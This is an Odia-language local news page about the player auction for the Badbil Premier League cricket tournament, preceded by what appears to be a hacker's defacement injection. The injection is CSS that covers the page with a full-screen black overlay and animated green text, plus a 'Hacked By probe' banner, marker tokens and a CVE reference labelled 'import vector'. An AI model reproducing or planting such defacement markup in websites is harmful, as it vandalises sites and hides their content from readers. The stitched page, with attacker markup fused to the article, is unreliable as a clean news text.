html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ବଡ଼ବିଲ ପ୍ରିମିୟର ଲିଗ ପାଇଁ ଖେଳାଳୀ ନିଲାମ ପ୍ରକ୍ରିୟା ଶେଷ : ୨୩୧ ଜଣ କ୍ରିକେଟର ବିଡିଂରେ ସାମିଲ।

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

 

Badbil/ Chitta Ranjan Kar : ଆସନ୍ତା ଅକ୍ଟୋବର ୨୮ରୁ ବଡ଼ବିଲର ଖେଳାଯିବାକୁ ଥିବା ଫଟାଫଟ କ୍ରିକେଟ ବଡ଼ବିଲ ପ୍ରିମିୟର ଲିଗ (ବିପିଏଲ) ପାଇଁ ବିଡିଂ ପ୍ରକ୍ରିୟା ସରିଛି | ବ୍ରଦରହୁଡ଼ କ୍ରିକେଟ କ୍ଲବ ଆୟୋଜିତ ହେବାକୁ ଥିବା ଏହି ଲିଗରେ ଖେଳାଳିଙ୍କ ପାଇଁ ସର୍ବାଧିକ ବିଡିଂ ମୂଲ୍ୟ ୫ ହଜାର ରଖାଯାଇଛି | ମୋଟ ୮ ଟି ଫ୍ରାଞ୍ଚାଇଜି ଏଥିରେ ସାମିଲ ହୋଇ ଖେଳାଳିଙ୍କ ପାଇଁ ବୋଲି ଲଗାଇଥିଲେ | କେନ୍ଦୁଝର ଜିଲ୍ଲାରୁ ମୋଟ ୩୦୦ ଖେଳାଳି ଆବେଦନ କରିଥିବା ବେଳେ ସେମାନଙ୍କ ମଧ୍ୟରୁ ୨୩୧ଜଣ ବିଡିଂ ରେ ସାମିଲ ହୋଇଥିଲେ | ଏହି ବିଡିଂ ପାଇଁ ବିକାଶମହଲ ଠାରେ ସ୍ୱତନ୍ତ୍ର ବ୍ୟବସ୍ଥା କରାଯାଇଥିଲା | ୫ ଜଣ କ୍ରିକେଟର ହରପ୍ରିତ ସିଂ, ପ୍ରମୋଦ ନାୟକ, ପପୁ ପରିଡା, କାମର ଆସ୍ତାରୁକ ଓ ସୁରଜ ସିଂ ସର୍ବାଧିକ ୫୦୦୦ ଟଙ୍କାରେ ବିକ୍ରି ହୋଇଥିଲେ | ବିପିଏଲର ବିଜେତାଙ୍କୁ ଟଫି ସହ ୫୦୦୦୦  ଟଙ୍କା ଓ ରନର୍ସ ଅପଙ୍କୁ ୩୦୦୦୦ ଟଙ୍କା ପୁରସ୍କାର ରାଶି ପ୍ରଦାନ କରାଯିବ | 
0
0
0
s2sdefault